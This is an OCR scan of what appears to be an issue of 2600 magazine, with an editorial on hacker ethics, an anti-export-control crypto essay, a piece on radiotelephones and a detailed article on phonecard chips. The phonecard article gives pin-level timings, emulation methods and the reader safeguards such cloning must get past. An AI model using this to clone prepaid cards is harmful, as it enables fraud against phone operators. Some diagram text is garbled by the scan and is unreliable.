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“Some of the computer attack tools, such as SATAN, are now so user-friendly that very 
little computer experience or knowledge is required to launch automated attacks on 
systems. Also, informal hacker groups, such as the 2600 club, the Legions of Doom, and 
Phrackers Inc., openly share information on the Internet about how to break into 
computer systems. This open sharing of information combined with the availability of 
user-friendly and powerful attack tools makes it relatively easy for anyone to learn how 
to attack systems or to refine their attack techniques.” - General Accounting Office 
report entitled “Computer Attacks at Department of Defense Pose Increasing Risks”. 
The only names they got right in this quote were SATAN and Internet. 
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KNOWLEDGE IS 


What makes the hacker world come 
alive more than anything else is newness. 
New technology, new ideas, new challenges, 
new people. We’re fortunate to live in an age 
where all of these are in abundance. 

But too often, we fall into the age-old 
trap of complacency. We do the same old 
thing, time and again, until it no longer is 
any fun. Before long, we hold little interest 
in new ways of doing things and the devel- 
opment of new technology is passed, once 
again, to the next generation. It’s almost a 
human trait - we see the same behavior man- 
ifest itself in the music and film cultures, not 
to mention within our own social lives. 

The hacker culture does not have to fall 

into this trap. In fact, it’s a double tragedy 
when it happens to us because of the vital- 
ity of newness in everything we do. While 
it’s inevitable that some of us will wind up 
working "establishment" jobs - perhaps be- 
coming CEO’s of Fortune 500 companies 
or putting Bill Gates out of business with 
software that really works - we don’t ever 
have to abandon that spark of life known as 
the hacker spirit. Those of us who built blue 
boxes in the sixties, played with CP/M in 
the seventies, or hacked the Arpanet in the 
eighties should be keenly aware of today’s 
new toys, whether they be DVD’s, PCS 
phones, or smart cards. This awareness ex- 
tends into the sociopolitical arena out of ne- 
cessity - the latest attempts to quell our 
enthusiasm and desire to spread informa- 
tion are every bit as important as those 
which occurred in years past. 

It’s easy to dismiss today’s beginners as 
newbies, AOL kids, or leeches who want 
easy answers. It would be a sad mistake to 
fail to distinguish between those who in- 
deed have no interest in true hacking and 
those who are the future. 

Over the years we’ve seen divisiveness 
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develop for all the usual reasons - genera- 
tional, national, regional, even sexual. Ide- 
ologically though, a great majority of the 
hacker world seems to stand for the same 
thing. We’re certainly not all on the same 
political wavelength but that’s a petty de- 
tail at best. What we share is the under- 
standing that free speech is paramount, 
individuality is a valuable asset, and that 
the net - which was developed with the 
hacker spirit - is potentially the most valu- 
able tool that free speech, individuality, 
and hence humanity itself has ever had at 
its disposal. 

While divisiveness can be fun, it ulti- 
mately winds up destroying, or at least 
greatly hurting, whatever community it af- 
fects. That would be of great benefit to the 
people who want us to go away so they can 
control and regulate technology, speech, so- 
ciety, or whatever it is they’re after. Every 
act of factionalization is a victory for them. 
Each time a hacker from the sixties calls 
the FBI to investigate “some punk kid” who 
breaks into his machine, we all lose some- 
thing. And every time someone new to the 
scene dismisses the hacker culture of years 
past, the potential river of knowledge is re- 
duced to a trickle. Such examples multi- 
plied are all that is needed to eliminate the 
“hacker threat”. 

We need to know why what happened to 
Bernie S. is a clear threat to hackers every- 
where, as is the continuing imprisonment 
and persecution of Kevin Mitnick. We need 
to know where to draw the line - defending 
people who, for example, commit credit 
card fraud or cause intentional damage to 
computer systems by considering them part 

of the hacker world is ultimately self-de- 
feating. 

We need to remember that we are all in- 
dividuals in this culture and that being part 
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of an image conscious hacker “group” can 
often obscure the real issues. New people 
are often wrongly intimidated into silence 
by big names who cover up their own igno- 
rance with bravado. It happens everywhere 
but it doesn’t mean we’re doomed to repeat 
history. If anyone can escape the pre- 
dictable, it should be hackers. 

One other very important thing we must 
be careful of is the temptation of true 
crime. While society is increasingly unable 
to tell the difference between crimes of cu- 
riosity and mischief and those of genuine 
criminals, we don’t need to be as obtuse. 
Yes, it’s easy to make quick and dirty 
money with some basic hacker skills. You 
can sell passwords, calling cards, credit his- 
tories, or cloned phones. But once that 
world is entered, the spirit of adventure and 
discovery is replaced by the incentive for 
profit, almost always permanently. Not to 
mention that you turn into an utter sleaze- 
bag. It’s up to all of us to see that we're not 
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polluted by such subversion. It’s up to our 
enemies to see that we are. 

As we enter our 14th year of publishing, 
we recognize the risks of succumbing to 
that which we warn others about. Over the 
years, we’ve tried to remain true to our 
ideals and to not be adversely affected by 
our ever-increasing exposure to the main- 
stream. We have a no-advertising policy 
which we intend to continue. We pledge 
never to “tone down” what we do in order 
to become more marketable. We promise to 
continue to give new and established writ- 
ers the same opportunity to be heard. 

The rest is up to you. We want to always 
have the edge in reporting on the newest 
technological toys, as well as continuing fun 
and games with existing phone and computer 
systems. And we can never forget the social 
issues that go with these. Those of you who 
have the knowledge also have the opportu- 
nity to share it with the rest of us. In so do- 
ing, we are all strengthened and motivated. 
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by Seraf 
seraf@2600.com 


Encrypted data communications is quite pos- 
sibly the least understood piece of the popular In- 
ternet culture’s technological backbone. Perhaps 
this is because cryptology is not trendy technol- 
ogy, but rather a complex science which is only 
beginning to be well-understood. Since the times 
before Christ, the study of secret writing, or 
cryptology, has played an important but largely 
invisible role in government. In fact, the Caesar 
Cipher (as in Julius) now appears in nearly every 
textbook on the subject. 

But don’t use an ancient code for anything 
more than slipping cuss words through moni- 
tored E-mail. While the Roman Empire’s system 
simply rotates the alphabet three places, turning 
A's into D’s, B’s into E’s, C’s into F's, etc., pre- 
sent-day cryptographic algorithms are much 
more complex. While pen and paper can break a 
simple substitution cipher like Caesar’s on short 
notice, cracking most any of the heavy-duty 
cryptosystems developed over the past twenty 
years requires more time and more computing 
power than potential adversaries apparently have. 

Cracking modern cryptosystems by brute 
force - trying every possible key until one 
“works” - usually takes a huge amount of time 
and/or money. Many newer symmetric cryp- 
tosystems use 128-bit keys, and this key size 
seems to have become a standard minimum in re- 
cent years. Building a machine to guess such a 
key within a year would presently cost billions of 
billions of dollars (no kidding) and require quite 
a feat of engineering. Many symmetric ciphers, 

though, use a smaller key. The Data Encryption 
Standard (DES) uses a 56-bit key, and (disre- 
garding the shortcuts available for breaking 
DES) its messages can be cracked by brute force 
in a month with equipment costing well under $1 
million. It is a fact that the National Security 
Agency (NSA) has such equipment ready and 
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Waiting, as do many other i 
private - from American Ex} 
Government to CalTech. 

What is really at issue here is the value of the 
potentially obtained information to a privacy-in- 
vading party. Uncle Sam will not take a chunk 
out of the Defense Budget, nor allocate a sizable 
portion of NSA’s computing power, in order to 
discover the key you’re using to send articles to 

2600. But he will - at the very least - put a few 
hundred thousand dollars worth of computers to 
work for a month on your e-mail if he thinks 
you’re spending your afternoons meeting with 
Saddam. These days, cryptosystems with keys of 
about 56 bits are not trusted to keep data secure 
for more than a few days or weeks. 64-bit keys 
are a significant improvement, and may secure 
data for decades. 128-bit keys are currently rated 
at 50 years, and slightly longer keys at about 100. 
(With computing power and resources on the 
Tise, it’s good to take these statistics with a grain 
of salt.) 

Of course, all of this depends on the security 
of the algorithm being used. Cryptanalysis, the 
Zen of cipher-cracking, has become as much of a 
science as cryptography itself. DES has had sig- 
nificant holes poked in its weak sides by a num- 
ber of cryptanalysts over the years, as have 
numerous other algorithms created by corpora- 
tions, universities, and brilliant mathematicians 
alike. The best route is to use a well-respected 
crypto package. Experimenting with your own 
ciphers can be fun, but will often lead to disaster 
if implemented for communications which must 
be reliably secured. 

Right now, the U.S. government holds what 
may be the best cryptographic technology in ex- 
istence. Skipjack, the algorithm implemented in 
Capstone and the much-criticized Clipper Chip, 
is classified, but is likely to be far ahead of cur- 
rent crypto research in the scientific community. 
(Note: One of the few civilians allowed to review 
the algorithm was Dorothy Denning, a slightly 
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overzealous Georgetown University professor 
who is opposed to all non-government use of 
crypto.) When the National Security Agency - 
perhaps the most secretive publicly-known sect 
of our governmentm - created the Data Encryp- 
tion Standard in the mid-1970’s, it was optimized 
to be resistant to differential cryptanalysis. It was 
not until 1990, however, that this method of 
crypto-cracking was publicly discovered by the 
notorious Eli Biham and Adi Shamir. This means 
that not only are today’s government cryptosys- 
tems designed to resist attacks that won’t be in 
use for twenty years, but that the government is 
ready to deploy those futuristic attacks against 
the algorithm you’re using today. Does this secret 
research not defy the scientist’s ethic to share 
knowledge and information? 

This is only the beginning of a growing U.S. 
government cryptomonopoly. New encoding al- 
gorithms are being developed in America con- 
stantly, and 2600 would be an ideal forum for 
their review and discussion. However, because of 
the U.S. Defense Trade Regulations (DTR) and 
2600's international readership, they cannot be 
detailed here: our favorite rag would be busted for 
trafficking in munitions, “transferring [crypto- 
graphic] technical data to a foreign person” (DTR 
120.10). See for yourself: the United States Mu- 
nitions List includes, along with plastique and 
land mines, the following items: “Speech scram- 
blers, privacy devices, cryptographic devices and 
software (encoding and decoding)...” (DTR 
121.1). Even documents describing “unapproved” 
cryptosystems or listing their source codes are 
munitions. 

What is “approved”? RSA’s nonthreatening 
authentication facilities have been deemed ex- 
portable, but its unmatched public key encryp- 
tion remains restricted to domestic use, along 
with PGP and other RSA-bearing products. Su- 
perslick modern systems like RC4 have been 
given the green light to appear in such globally 
available products as Netscape, but only after se- 
curity-reducing modifications. Then-there are the 
algorithms denied export altogether, or that won’t 
even be given a hearing. Such has been the fate of 
Granddaddy DES, as well as that of many cryp- 
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tosystems being developed at the undergraduate 
and graduate levels in American universities. 

This is without question a breach of our First 
Amendment rights. If you design a cryptosys- 
tem, you are forbidden by your government to 
share it with whomever you please. Approval is 
required. We have had trade restrictions placed 
on our ideas. Exporting information which is 
“required for the design... of defense articles” 
(DTR 120.23) is illegal - so a book such as Phil 
Zimmerman’s “PGP Source Code and Internals” 
is by definition banned for export. (If you 
thought that banned books were a thing of the 
past, think again.) Even a foreigner on American 
soil is technically forbidden to examine such a 
publication at the corner bookstore. 

American cryptologists are considered to be 
the best in the world, and the majority of strong 
cryptosystems originate in U.S. companies and 
universities. This technology has brought elec- 
tronic privacy and freedom to Americans who 
put it to good use, and could do the same for citi- 
zens of other nations if it was not so feared by the 
powers that be. If we don’t act soon, restrictions 
on the domestic use of cryptographic technolo- 
gies are just around the corner. Legislation to im- 
pose such constraints on the American people 
has already been introduced on at least one occa- 
sion, nearly forcing all available cryptosystems 
to be made readily crackable by Big Brother. 

Simply put, NSA is scared: terrified of Amer- 
icans enforcing their own privacy with such 
strength; living in fear of foreign government or- 
ganizations, businesses and individuals obtain- 
ing the same level of security as their American 
counterparts. 

Use crypto anywhere you can - and make sure 
it’s strong. Fight the U.S. government ban on 
knowledge and its underhanded attempts to thieve 
the world of digital privacy. U.S. citizens - write to 
your senators and congressmen and explain how 
important this technology is to every citizen of 
the Electronic Age, here and abroad. Foreign citi- 
zens - obtain source code to strong European al- 
gorithms such as Xuejia Lai and James Massey’s 
IDEA, and make every attempt you can to secure 
“restricted” algorithms. Raise your voice! 
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by Equant 


There are a few reasons for this article. 
First, several years ago while cruising 
around New Mexico with a good friend we 
ran across a radiotelephone. It was in a park, 
and I’ve always assumed it was for park 
rangers to use. We horsed around with it and 
didn’t accomplish much. Had we been pre- 
pared for what we found we might have 
been more successful. Another reason for 
this article is that radiotelephones are com- 
mon outside of the United States, and I’ve 
always enjoyed 2600’s drive to inform 
everyone around the world. The last reason 
is I’ve never seen much said about radiotele- 
phones. So read the following, and if you 
run into a radiotelephone in the woods you'll 
know it’s not a complex weather station. 

Radiotelephones are used to connect iso- 
lated areas to a phone network without the 
installation of phone lines. Some places you 
might find a radiotelephone would be in re- 
mote industrial parks, islands, and isolated 
communities such as state militia headquar- 
ters, cult compounds, and communes. 

There are a few different types of ra- 
diotelephones. It seems that Optaphones 
and Ultraphones are the most popular. Ra- 
diophones usually operate somewhere be- 
tween 30MHz and 3000MHz. All users of 
radiotelephones (in the U.S.) need FCC li- 
censes (hooray for the FCC!). They are all 
full duplex and can use standard phone 
equipment on the subscriber’s end (i.e., the 
subscriber gets an RJ-11 jack to plug a nor- 
mal phone into, or a modem or a fax). I’ve 
not heard of a radiotelephone that can 
transmit data over 9600bps. 


Optaphones 
These systems are for individuals or 
small groups of people. First we need to 
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travel from the telco’s switch along a phone 
line to the middle of nowhere. Once the line 
ends we’ll find a base unit. The base unit 
has a power supply (perhaps a battery and a 
solar panel), a phone box, and a yagi an- 
tenna. The yagi antenna of course is 
pointed at the subscriber’s yagi antenna 
which is connected to their box which is 
connected to their phone. 

There is an Optaphone called the Com- 
munity Optaphone Star which is a similar 
setup to the above, with the two yagi anten- 
nas, but you have a more complex sub- 
scriber box which can operate 24 trunks at 
once. With this system you can have 96 
subscribers. Keep a look out for this system 
in Alaska, Montana, and Pennsylvania. 


Ultraphones 

Ultraphones are mostly purchased by 
telcos. They are not one subscriber systems 
like the Optaphone. The Ultraphones sup- 
port true digital local loop service and can 
handle 896 lines and 95 full duplex trunks. 

Like the Optaphone it has two compo- 
nents, the subscriber side and the host side. 
The host’s end has two parts. In the telco’s 
central office is the Central Office Terminal 
(COT). The COT is a PBX with a VF loop 
level connection to the central office. From 
the COT the signal is sent to the Radio Car- 
rier Station which sends the signal up a 
large radio tower. (Note this is an omni di- 
rectional antenna and not a yagi antenna.) 
The signal is not line of site, and can reli- 
ably go 60km/37.5 miles. 

On the subscriber’s end you have a yagi 
antenna connected to a radio modem and 
power supply. The subscriber unit can han- 
dle normal RJ-11 phone equipment, with 
DTMF and pulse dialing. The subscriber 
broadcasts somewhere from 454.025 MHz 
to 454.650 MHz and receives between 
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459.025 MHz and 459.605 MHz. Each 
channel is separated by 25 khz, and each 
channel can contain four trunks. 

The signal goes from the subscriber’s 
mouth into the subscriber’s phone. The ana- 
log signal is then converted into a 14.57 
kb/s digital signal. The signal is modulated 
and transmitted at a rate of 64 kb/s. This sig- 
nal is multiplexed with three other signals in 
order to obtain the four trunks per channel. 


Locations in the U.S. 

There are 120 systems in the U.S. Most 
of them are west of the Mississippi River. 
I’m not sure of all the locations, but here’s 
what I do know. There is at least one system 
in Florida, Maine, California, and New 
Mexico. There are two in Arizona, one on 
the Navajo reservation. GTE in Texas has 
30 systems. The most interesting is that Big 
Bend Telco, southeast of El Paso, serves 
two thirds of its exchanges (25,000 square 
miles) with 15 systems. 


Locations outside the U.S. 
Worldwide there are over 300 Ultra- 
phone systems. Here’s a list: 


Indonesia 46 
Mexico 39 
Philippines 26 
Myanmar 07 
Puerto Rico 05 
Russia 05 
Brazil 04 
Columbia 04 
Canada 03 
Sri Lanka 03 
Haiti 02 
Korea 02 
China 01 
Kuwait 01 
Nigeria 01 
Taiwan 01 
Venezuela 01 
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The NEW 2600 Web Site! 


The Latest Hacker News 
Hacked Web Sites 
Payphone Photos 

Off The Hook in 

Real Audio 

More Info on the 
Secret Service than 
They Themselves have 
CGI Search Engine 
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by Billsf 

You paid for your chipcard and it is right- 
fully yours! Here are some hints to test the card 
and find out its secrets. The synchronous card is 
fully static. You can single-step the clock and 
record the characteristics accordingly (see 
schematic for special reader/writer). The analog 
characteristics are extremely important. “Ana- 
log” in this context means timings, rise times, 
and characteristics of the I/O at different phases 
of the process. 

While the exact timings and content of last 
year’s cards will be explicitly detailed, you want 
to be able to keep up with the game and analyze 
cards from other countries before you get there. 
In other words, if your emulation does exactly 
what the official version does, your “card” is 
therefore the real thing in all respects. 


Introduction 

In the following pages we will explore chip- 
cards, their types and possibilities. All informa- 
tion in this piece is public, either from 
international documents or derived from the 
card itself as in the case of the analysis of the 
Dutch and French phonecards. No laws were 
broken in obtaining this information and it is 
expected that the reader will consider this a 
new area to hobby with. Criminal use of this in- 
formation is on the criminal himself and in no 
way do we encourage fraudulent use or damage 
to existing systems. It will be up to the user to 
decide what uses of the emulator are ethical or 
legal. There is presently questionable software 
available for the smartcard “inverse reader” on 
the net. 

Some of you will find that spent phonecards 
make very secure keys for electric locks. More 
ambitious hobbyists will want to experiment 
with true processor cards. In this case the man- 
ufacturer will provide software tools to pro- 
gram the card. It will be up to the individual to 
develop their own system. In the meantime the 
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“inverse reader” can be used to emulate exist- 
ing chip masks. Tools to do this may be avail- 
able from manufacturers of chips for cards. 
Prices of smartcards can be as little as $2 for 
ones with simple processors and small memory 
to over $15 for chips that can handle RSA, have 
larger memories, and overall better security. In 
any case the minimum order is likely to be over 
100 cards. Small quantities of conventionally 
packaged chips (dil-8) can be obtained for de- 
velopment. All processor cards are capable of 
crypto. It is suggested that openly available sys- 
tems like DES and IDEA be used to secure the 
cards. On the more expensive cards, you can 
implement PGP! If you try to implement your 
own “blackbox” it will surely be cracked unless 
you have a great deal of expertise in this rather 
obscure and closed field. 

This article is geared towards the hardware 
aspect of chipcards. It will be up to the reader 
to obtain or write software tools. The schemat- 
ics are for “professional quality” industry stan- 
dard tools. You will save hundreds of dollars by 
building your own! The designs are strictly 
mine and any commercial use will be consid- 
ered an infringement. 

While the original scope of this article was 
to cover the memory cards or, simply put, 
“dumb cards”, it is generally agreed that they 
are obsolete. PTT’s will continue to use them 
for years to come, but in the more developed 
world, a changeover is likely to occur soon. 
Holland, Germany, and France are almost 
surely to be first. However, just about every 
country except the USA has a phonecard with 
value on it. (It should be noted here that 
NYNEX is experimenting with the old-fash- 
ioned diffraction grating cards once in common 
use in Europe. Also note that the system of 
billing for a call is not readily compatible yet in 
North America. ) 

We will begin with a comprehensive analy- 
sis of memory cards and their workings. From 
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this information it will be possible to emulate 
them. We will discuss security tactics used to 
discourage this. The sharp reader will learn that 
it is easier to emulate a “dumb card” than to 
read/write one. The intelligence is in the card 
reader along with all the safeguards, which in- 
clude things like “wire detection”, “swallowing 
the card”, and “blacklisting” abused series 


numbers. 


Chipcards 

What is a chipcard to start with? It is gener- 
ally seen as the familiar phonecard seen in an 
ever increasing number of countries. It was first 
produced in France under license from Bull 
S.A., a well known computer firm. The infor- 
mation is public and is described in ISO/IEC 
7816. This multi part document describes the 
physical requirements of the cards and chips in 
the first two parts. The third supplies the recom- 
mendations for both sync and async chips. 
Other parts have been added over the years as 
the technology has matured. 

Most people think these telephone cards are 
the much touted “smartcards”. In fact, all pre- 
paid telephone chipcards are just memory cards 
often referred to in the industry as “dumb- 
cards”. At present manufacturers often refer to 
security as using different types of memory, se- 
curity fuses, and special undocumented secu- 
rity features. The Siemens SLE4404 is a good 
example of a multipurpose memory card. This 
is quite possibly the German phonecard which 
has been said to be reloadable up to 100 times. 
This datasheet mentions this feature, but one 
must know a 16 bit code to get in, which is ap- 
parently databased by Telekom. The other op- 
tion is to blow a certain security fuse and the 
card is irrevocably single use. Pin 4 is test and 
pin 8 is that fuse pin. Both become open (not 
connected) when the card is secured. They are 
the bottom contacts on eight contact modules. 
Many one use cards dispense with these con- 
tacts altogether. 

At present there are two major types of 
memory card on the market. Both types have 
their own unique method of marking value and 
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methods of security. The French type is proba- 
bly less expensive than the German type men- 
tioned above, has been in use longer, and is 
used in most countries that use chips for 
phones. Modern readers could read both of 
these memory cards and processor cards too. 
Either through politics or mistrust of each 
other’s systems, most memory cards are limited 
to the country issued. Other prepaid card sys- 
tems include three types of magnetic card and 
the diffraction grating card. The chips are likely 
to replace all of these older types. It is sus- 
pected many nations are waiting for the more 
secure processor type before changing over. 

First came the French card for France 
around 1986. It used the “French position” for- 
mally called AFNOR. The ISO position came 
later, in 1989. The chip module was rotated 180 
degrees and placed directly below, as continu- 
ing the 2.54mm spacing. (Looking at a standard 
ISO card, the French position is directly above 
when the card is viewed in the normal horizon- 
tal position with the module to the left.) This 
original version was a pathetic fuse-link ROM 
that was quickly cracked by students. This out- 
dated system can be found in India and perhaps 
other third world countries. Failure of both the 
cards and readers was very common. “Fuse- 
link” ROM also implies a power hungry bipolar 
technology where a high current pulse is 
needed to burn a unit. 

The new card adopted the ISO position and 
uses a NMOS, EPROM technology. 21V +/- 
2.5% is applied on the Vpp pin to alter the card. 
The value is stored as “units” and the largest 
card contains 120 and perhaps 10 bonus tics. 
There is room for a maximum of 152 units (see 
memory map). The total usable memory area, 
fixed and changeable, is 256 bits. Included are 
country codes, manufacturer codes, the initial 
value, and the last byte contains FF if the card 
is new. 

The “Rest Of the World” version has a 
slightly different format in the first twelve 
bytes. While the old versions burned the card in 
a linear fashion which was provided with the 
number of units needed, newer versions place 
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more tics than needed in a particular order de- 
termined by the info in the first part of the card. 
A crypto algorithm determines where the 
places will be from the series code and possibly 
other areas of the first 96 bits. This algorithm is 
not known to the author, but is apparently a pro- 
prietary one. Its purpose is to prevent mass em- 
ulation of the cards. It can be assumed that 
copying one card would allow many “re-uses” 
until it was “blacklisted” by the system. One 
would of course have to change to another 
phone to use a copy! It is not determined how 
the cels are updated in France and countries 
that use the similar system. (Any takers? 
French police tactics are downright scary!) 
When a card is used up, there will be remaining 
“units”. This is like a LOTTO at its best. Which 
16 or 24 or more bits are not set out of a field of 
152? The apparent key length is 56 bits and the 
“LOTTO field” has an astronomically larger 
range and could act as an extension in a double 
crypt system. It would appear to be something 
like DES and perhaps as secure or more so. 

The NMOS output has levels much like 
TTL and is compatible to it without any pull-up 
resistor. The French cards use an active low 
RST on pin 4. The Vpp is on pin 6 and is +5V 
while reading and upped to +21V to modify. 
Pin 2 is R/W and is low (0) unless a modifica- 
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tion is to be made. When 1, the Vpp is ex- 
pected. The CLK is pin 3 and the “I/O” is pin 7. 

The system used in Holland is based on the 
German system that appeared in 1989. While 
the card uses a large number of possible secu- 
rity measures, only a few are actually checked 
in either country. The card operation and 
method of storing value are completely differ- 
ent than the French type (see memory map). 
There are 512 possible memory locations. The 
card itself contains much of the security. A full 
rundown of all security measures will be pre- 
sented (see timing diagrams). 

Power-on-reset: If the CLK is 0 and the re- 
set is one, the I/O sources current. A proper re- 
set is RST to 1, a single CLK pulse to 1 and 
back to 0, and then RST to 0. It has been found 
the card will reset when the RST falls before 
the CLK. This may be one of the “undocu- 
mented” security features. The I/O is the clock 
inverted with the addition of current sourced 
when the RST is 1. Rise and fall times are very 
fast and well under 20nS! The sink current is 
twice the source current as would be expected 
using equally sized N and P channel fits in a 
CMOS arrangement. 

Here is the performance of a typical card. 
With the RST 1 and the CLK 0, the output will 
source 4mA at 4V or put another way there will 
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be a one volt drop if 1k0 is placed from the out- 
put to ground. This is the only occurrence of 
this chip sourcing current. This chip (like all 
known CMOS chipcards) normally relies on an 
“open drain” output. It will pull a 1k0 resistor 
tied to Vcc to 0.5V, (At this point it should be 
noted that 6k8 is the standard value used to 
pull-up the output.) On testing about 100 cards, 
the propagation delay between the CLK to out- 
put into +/-30pF ranged between 18 and 20nS 
for the output falling and 33 to 37nS for the 
output rising with no resistive load. This is 
most certainly a security feature. 

CLK to DATA out: For a read, the CLK must 
be 1 for at least 450nS. However this value is 
transferred to a flip-flop so when CLK falls, the 
data is ready in about 42nS, going from 1 to 0. 
The data is read through an open drain output 
(the VO) and is pulled up by a 6k8 resistor in 
the phone. Going from 0 to 1 under ideal condi- 
tions, the propagation delay is 55nS. Additional 
risetime formed between the 6k8 resistor and 
the capacitances of the card and reader are 
likely to add over 150nS. The capacitance of the 


If RST has remained 0, 

during the O portion of CLK, 
then PC increments on the up 
going flank of CLK 






pin 3 CLK 


pin 2 
pin 7 


(internal) 


T = test F = fuse 
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standard Landis & Gyr reader is about 30pF. If 
this value is tightly controlled, the risetimes can 
reveal additional capacitance and possibly re- 
ject a defective card. A good card would be ex- 
pected to have less than 10pF at its output. 
Modifying data: A “write” is defined as 
changing a | to a 0. An “erase” is defined as 
putting all zeros in a lower value field to all 1’s. 
To perform a write, an RST pulse is generated 
while the CLK is 0. (This pulse can be as little 
as 1uS.) The, clock is then specified to remain 
high (1) for 10mS to allow time to zap the bit. 
On the actual card, this CLK pulse can also be 
about luS, which allows the measurement of 
the time actually required to change the bit. It 
has been found to be about 2mS which is far 
shorter than the worst case specified. There is 
probably nothing to do with security here, ex- 
cept the CLK is masked out during the write 
period on the newer cards. A read can be per- 
formed only if the last operation was a success- 
ful write (bit changed from 1 to 0). When the 
CLK is once again 0, another RST pulse is ap- 
plied and the CLK is specified to remain 1 for 






Normal read and reset 





bit 1 
output 





Abnormal reset 


will reset 
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10mS while all eight bits of the next lower 
value field are changed to 1. (In other words 
you cannot add more value than you removed. 
As each bit in a lower value field is 1/8 that of a 
higher value field, zapping a higher value field 
bit when all the lower value field bits are 0 will 
restore those bits.) 

Series number: Chips are made in lots of 
100. Each lot has its own number. Through cen- 
tral administration it is possible to monitor 
fraud and cancel cards that appear to have been 
used for more than 100 times its value. In gen- 
eral the machine will not care if the number is 
in range and not in its memory of cards to re- 
ject. While not as clever as the French method, 
it will serve to keep criminal and lamer abuse 
down! 

Much of the card, like the series number, 
cannot be altered. There are only 36 “value 
bits” on most cards. (The older cards had a 1/8 
cent subfield that could be written.) There are 
however a total of 80 bits that can be set to 0 
and stay that way. Trying to write in most “for- 
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bidden” areas will do nothing, but in certain ar- 
eas the card is frozen (program counter doesn’t 
increment anymore) if a write is attempted. 
These all appear to be security measures that 
could be taken to verify a card but it is appar- 
ently never done. 


Future Imperfect 

The PTT will not always use dumb cards. In 
fact the present system can read some basic 
“challenge response” cards now available. The 
DES-like key is stored on each card and getting 
the key from one card opens the whole system 
to the cracker. The 64 bit challenge is issued 
from another smartcard inside the phone. Their 
card contains the same key as the one you own. 
Therefore a “randomly” generated challenge is 
crypted and sent to your card. Your card uses 
the key to decrypt this and sends the initial 
“random” 64 bits back to the reader on the 
phone. If a match has occurred, the phone will 
deduct the cost of a tic. This is fast enough to 
make each and every tic a separate transaction. 
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Almost every smartcard system uses this 
method and it is only a matter of time until the 
keys get out. Other key distribution methods 
could be used to prevent the problem of keep- 
ing all one’s secrets on each card. In general, 
the PTT will go no further than what hackers 


show is insecure. 


Determining Card Type 

The synchronous card is clocked at 50kHz 
to read and has an “active high” reset. The 
async card is usually clocked at 3.58 MHz and 
has an active low reset. The processor card will 
probably not function much below 1 MHz any- 
way, so on this alone the machine can check 
for card type. There is no specified way to de- 
termine card type as the three types are greatly 
different. The French cards also have an active 
low reset and so do some special purpose cards 
that are generally used as keys. In any case the 
differences between types is great enough that 
there needs to be no standard to tell them 


apart. 


Processor Card Emulation 

All the emulation must do is see the reset 
rise and then answer with the standard “I’m 
here” response. This response is expected 
within 11mS, but may come as early as 112uS. 
(In emulation the RST asserts the CTS of the 
RS232 port.) At this point the “card” I/O is an 
input (default) and waits for further instruc- 
tions. In computer terms, the format is 9600 
bps, start plus eight databits, a parity bit, and 
two stopbits minimum. 

In many systems, the “inverse reader” is 
used to program the card device. To do this one 
must know how to answerback with a message 
saying; “I have more for you.” At this point a 
whole new identity can be loaded or audits con- 
ducted. It is likely the speed will be increased to 
19.2 or 38.4 kbs for “security” or time savings. 
Every “facility card” is different and either de- 
velopment of your own or leaked knowledge of 
present types is needed to gain entry to the card 
itself. You can however reset the card and get an 
answer, then issue it a challenge and get a re- 


for systems where card is inserted horizontaly 
Wires can be connected and ran on top or below module 
for systems where card is inserted lenghthwise, 


run wires to far end from module. 
Placement is not critical in this case. 


Note: not to scale 


Bring 0.22mm wires (or thiner) to lower centre of card 
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seeps 


sponse. Improper challenges often result in get- 
ting an ASCII ‘n’ (for no?) back. Certain control 
characters will give predetermined test re- 
sponses, but only properly framed (and typi- 


Besides, you are likely to waste quite a few 
cards before you get results even if using a 
proven technique. 
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card is a fine example of a nonsecure system. 
Since the card is readable and writable in the 
clear, junks, for instance, can get all the dope 
they need with the help of a hacker. To hack 
such a system all one must do is monitor the 
protocol between the reader and card. Inverting 
the I/O and connecting to the RxD pin of a ter- 
minal at 9600 and proper settings will expose 
the “conversation”. To do this you need a “card” 
and socket to form a sort of breakout box. More 
sophisticated systems could segregate out what 
the card says and what the reader says. 


oz xja EJN g~ ojo O 
>|£ ole Mec Sc Zic : A . ; P 
2u Oe HG a ofa H cally 64 bit) challenges will produce a normal Metal Detectors, Wire Detection 
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nm l 5 o r š 
“Ue re cards use crypto. In the industry this is called | what they are doing. As mentioned in the secu- 
“mag stripe emulation”. The German medical | rity area, there is a simple check for risetime on 


an open drain output. The time to cross the 
CMOS threshold is approximately 0.7RC. R is 
6k8 in just about any reader and C is typically 
5pF for a CMOS input and max of 10pF. A sim- 
ple grid plate can check for the clock appearing 
where it should not. A small coil is supplied to 
check for the presence of wires attached, 
printed circuit traces, and induced signals. 

In other countries, the whole card may be 
“swallowed” and held. This will eliminate the 
need to use sophisticated wire detection meth- 
ods. The card is entered in the long direction 
and a trap door closes that is supposed to cut off 


‘French type’ memory card, jump JP1,JP3,JP4 


5V only memory card, jump JP1,JP3 
jump JP5 for RST active low or high 
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to take apart the module, remove any protective 
coating, determine the type of chip, and probe 
it under a microscope. This is a lot of work in a 
non-smoking environment!) In a realistic sys- 
tem, public keys would be exchanged and then 
a switch to “conventional crypt” would be used 
as RSA is very computational intensive. If you 
look at it as PGP on a chip, you got the idea! 
The cost of this type of card puts this sys- 
tem, for most uses, in the future. On all proces- 
sor cards, it is the job of the processor to keep 
secret information on the card. There have been 
many reports of being able to “glitch” a card 
and read out its ROM with keys! Exact details 
are sketchy and beyond the scope of this article. 
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lengths with standard numbers of conductors. A 
chipcard may need a minimum of five and a 
maximum of eight conductors. Another ap- 
proach has been to use microelectronics and 
build a self-contained emulator. While it may 
work fine in Germany or Greece it will be re- 
jected by the metal detector in Holland. 


Processor Cards 

While the scope of this article was to be on 
synchronous cards, the ability to “talk to” (read 
and write) asynchronous processor cards 
should be considered important. The circuitry 
is very simple and works with the serial port at 
9600 bps. A very cheap 3.58 MHz quartz xtal 
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supplies the clock. Per standard, all “smart- 
cards” answerback at 9600 when the clock 
speed is 3.58 MHz. When used with the right 
software, one can do many things with the card, 
depending on how it is programmed. An in- 
verse reader that also runs on the serial port 
will be described. The clock is ignored as your 
computer has one and simply talks to the card 
politely, one way at a time. To avoid any con- 
flict of interest, all designs are my own and may 
be used for any non-commercial and non-crim- 
inal purpose. 


Dumbmouse Universal Reader/Writer 
(Notes on Schematic) 

When configured for a processor card, the 
3.58 MHz xtal osc is allowed to run, supplying 
the required rate for the card to typically pro- 
duce 9600 bps serial data. While extremely 
simple, it is expected anyone using such a cir- 
cuit will have proper prior knowledge of elec- 
tronics and possibly software. The jumper 
options allow for variations on software and 


also provide the possibility of the CTS, DTR, 
and in some cases the TxD pins to provide the 
circuit power. External power (either a hard 
